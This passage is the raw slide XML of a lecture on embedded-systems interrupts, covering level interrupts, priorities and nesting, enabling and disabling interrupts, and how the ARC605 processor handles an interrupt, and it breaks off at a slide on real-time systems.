            <a:off x="457200" y="1981200"/>
            <a:ext cx="8305800" cy="4419600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" smtClean="0"/>
              <a:t>level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> interrupt means that the line remains asserted until the processor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" smtClean="0"/>
              <a:t>acknowledges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> the interrupt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>The processor is sensitive to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" smtClean="0"/>
              <a:t>level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> of the signal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>A level interrupt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" smtClean="0"/>
              <a:t>must</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>be acknowledged or it will keep interrupting the processor!</a:t>
            </a:r>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eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>From this point on, we shall assume all interrupts are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" smtClean="0"/>
              <a:t>level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> interrupts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4098" name="Object 6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="990600" y="3733800"/>
          <a:ext cx="4267200" cy="1570038"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s17445" name="Visio" r:id="rId3" imgW="2677668" imgH="985647" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId3" imgW="2677668" imgH="9856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733800"/>
                        <a:ext cx="42672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9576885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en-US" smtClean="0"/>
              <a:t>Interrupt Priorities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106499" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Every IRQ has an associated priority</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Assume </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>IRQx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> has priority 1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>IRQy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>priority 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>IRQx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>IRQy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> are asserted simultaneously, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>IRQy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> will be serviced</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>IRQy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> is asserted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>while servicing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>IRQx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>IRQy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> will be serviced immediately (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>interrupt nesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>IRQx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> is asserted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>while servicing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>IRQy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>IRQx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> will remain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>pending</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> until all interrupts with higher priority are serviced</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Typically there is no need for more than 2 or 3 priorities (in ARC 605 – 2 priorities)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>Exceptions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> typically have the highest priority</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28252934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eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
              <a:t>Enabling and Disabling interrupts in the processor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109571" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>enable / disable is per the interrupt priority, in some cases may be per interrupt line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>In ARC 605, the enable / disable bits are located in the STATUS32 register (aux register 0x0A)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>The compiler has intrinsic functions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" smtClean="0"/>
              <a:t>(_enable(), _enable1(), _enable2(), _disable(), _disable1(), _disable2())</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Some interrupts are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" smtClean="0"/>
              <a:t>Non-Maskable-Interrupts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0"/>
              <a:t> (NMI)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> – cannot be disabled (usually only exceptions)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" smtClean="0"/>
              <a:t>Note:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>disabling interrupts through the processor, disables the interrupt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" smtClean="0"/>
              <a:t>processing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" smtClean="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>the interrupt line may still be asserted by the device</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>once interrupts are enabled, pending interrupts will be processed</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" i="1" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6238571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pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
              <a:t>Enabling and Disabling interrupts in the device</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113667" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Many peripherals have a register to enable and disable interrupts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" smtClean="0"/>
              <a:t>(Interrupt Enable Register – IER)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>A single peripheral may have various </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" smtClean="0"/>
              <a:t>causes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>for an interrupt, and the interrupts may be enabled and disabled per cause</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Example: a network device may signal an interrupt when a packet was received </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" smtClean="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> when a packet was transmitted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" smtClean="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> when the cable has been plugged in </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Each bit in the IER represents a cause</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="278022004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fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
              <a:t>What does the processor do when an interrupt occurs?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120835" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>This is very processor specific</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>In general:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Stores the current instruction pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Stores some or all of the processor state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Disables all interrupts of the current level and below it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Looks up the address for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" smtClean="0"/>
              <a:t>Interrupt Service Routine (ISR) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> for the specific IRQ from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" smtClean="0"/>
              <a:t>Interrupt Vector Table (IVT)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Sets the instruction pointer to the ISR address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="250368582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fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
              <a:t>What does ARC605 do when an interrupt occurs?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121859" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1981200"/>
            <a:ext cx="8229600" cy="4572000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Assume IRQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" smtClean="0"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> is asserted, and that it has priority </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" smtClean="0"/>
              <a:t>p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>(p is 1 or 2)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" i="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>The instruction pointer is loaded to the appropriate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" smtClean="0"/>
              <a:t>Interrupt Link </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>register </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0"/>
              <a:t>ILINKp (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>r29, r30)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>The STATUS32 register is copied to the STATUS32_Lp register</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>This register contains some flags of the internal processor state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>It also contains two </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" smtClean="0"/>
              <a:t>interrupt enable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> bits – one for each interrupt priority</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" smtClean="0"/>
              <a:t>interrupt enable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> bits in the STATUS32 register for any priority &lt;= p are set to 0 (interrupts disabled)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>The instruction pointer is set to 0x8 * n (which will usually contain a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" smtClean="0"/>
              <a:t>jump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> instruction to the ISR)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="803397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smtClean="0"/>
              <a:t>Real-Time Systems</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50179" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Subclass of embedded systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
